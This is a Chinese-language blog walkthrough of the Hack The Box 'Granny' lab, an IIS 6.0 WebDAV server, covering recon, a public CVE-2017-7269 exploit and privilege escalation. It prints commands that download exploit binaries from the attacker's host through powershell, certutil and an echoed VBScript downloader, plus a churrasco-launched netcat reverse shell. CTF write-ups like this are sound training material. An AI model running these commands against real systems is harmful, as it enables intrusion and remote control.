Flydragon's Blog
859 words
4 minutes
[HTB] Granny Walkthrough
2024-04-08
HTB
Write-up
Chinese

visitor badge

前言#

看到朋友在寫所以 the 學
剛接觸 Windows 滲透,不想重複踩坑,所以來寫靶機的 Write-up,做個紀錄這樣 XD
這台是 Hack The Box 的 Granny,難度是 Easy

使用到的技巧:

  1. VBScript 傳輸檔案
  2. churrasco.exe 提權

Attacker: 10.10.16.2
Target: 10.10.10.15

Recon#

  1. nmap
sudo nmap -sV -sC 10.10.10.15
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan: 
|   Server Date: Mon, 08 Apr 2024 02:27:18 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/6.0
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.73 seconds

看起來是 WebDav Server,且用 PUT method 可以上傳檔案

  1. 看看 Web 的部分

img

用 burp 看 response header 可以知道是 ASP.NET 框架

  1. dirsearch
dirsearch -u http://10.10.10.15/ -r

有些資訊洩漏,但沒什麼想法

[22:45:28] 200 -  246B  - /_private/     (Added to queue)                   
[22:45:28] 301 -  153B  - /_private  ->  http://10.10.10.15/%5Fprivate/     
[22:45:28] 200 -  759B  - /_vti_bin/     (Added to queue)                   
[22:45:28] 301 -  155B  - /_vti_bin  ->  http://10.10.10.15/%5Fvti%5Fbin/
[22:45:28] 200 -    2KB - /_vti_inf.html                                    
[22:45:28] 301 -  155B  - /_vti_log  ->  http://10.10.10.15/%5Fvti%5Flog/
[22:45:28] 200 -  246B  - /_vti_log/     (Added to queue)
[22:45:28] 500 -   88B  - /_vti_cnf/
[22:45:29] 200 -  195B  - /_vti_bin/_vti_aut/author.dll                     
[22:45:29] 200 -   96B  - /_vti_bin/shtml.exe?_vti_rpc
[22:45:29] 500 -   88B  - /_vti_pvt/
[22:45:29] 200 -  195B  - /_vti_bin/_vti_adm/admin.dll
[22:45:29] 200 -  106B  - /_vti_bin/shtml.exe/qwertyuiop                    
[22:45:29] 200 -  105B  - /_vti_bin/shtml.dll/asdfghjkl                     
[22:45:29] 200 -   96B  - /_vti_bin/shtml.dll
[22:45:40] 200 -  369B  - /aspnet_client/     (Added to queue)              
[22:45:40] 301 -  158B  - /aspnet_client  ->  http://10.10.10.15/aspnet%5Fclient/
[22:45:52] 301 -  149B  - /images  ->  http://10.10.10.15/images/     (Added to queue)
[22:45:52] 200 -  242B  - /images/
[22:46:08] 200 -    2KB - /postinfo.html

Exploit#

  1. Google

找到一個 RCE 的 exploit
https://github.com/eliuha/webdav_exploit

沒拿到 shell 換個 exploit
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell

拿到 shell ㄌ,但還拿不到 user flag img

Privilege Escalation#

systeminfo + Windows-exploit-suggester

python2 windows-exploit-suggester.py --database 2024-04-01-mssb.xls --systeminfo sysinfo.txt

拿到蠻多路線的,可以一個一個嘗試

不過沒辦法用 powershell 傳輸檔案

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.2:8000/ms15-051_x32.exe', 'ms15-051_x32.exe')"

改用 Certutil.exe 也不行

certutil.exe -urlcache -split -f http://10.10.16.2:8000/ms15-051_x32.exe

不過之前 RECON 知道可以用 PUT 上傳檔案
用 davtest 確認一下可以上傳的 extension

davtest -url http://10.10.10.15
 Sending test files
PUT     shtml   FAIL
PUT     cgi     FAIL
PUT     cfm     FAIL
PUT     pl      FAIL
PUT     php     FAIL
PUT     aspx    FAIL
PUT     asp     FAIL
PUT     jsp     FAIL
PUT     txt     FAIL
PUT     html    FAIL
PUT     jhtml   FAIL

哭阿,居然沒得用

只好用 VBScript

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript /nologo wget.vbs http://10.10.16.2:8000/ms15-051_x32.exe ms15-051_x32.exe
.\ms15-015_x32.exe

卡住了,ctrl+c 重發 exploit,然後就拿不到 shell ㄌ

一個一個試太浪費時間,等待 Reset 的垃圾時間再去 Google 一下
找到 churrasco.exe

https://github.com/Re4son/Churrasco/

用 VBScript 上傳 churrasco.exe 跟 nc_x32.exe
再用 churrasco.exe 彈 reverse shell

churrasco.exe -d "nc_x32.exe -e cmd.exe 10.10.16.2 1234"

提權成功!
img

後記#

RCE 部分很明確,後來看其他人的 Write-up 發現還有蠻多種方法
提權部分就有點坐牢了,老機器減少樂趣QQ
學到用 VBScript 傳輸檔案跟新的提權方式還是蠻賺的,可惜沒怎麼玩到 WebDav

[HTB] Granny Walkthrough
https://flydragonw.github.io/posts/htb_granny/
Author
FlyDragon
Published at
2024-04-08
[HTB] Silo Walkthrough
Hello World!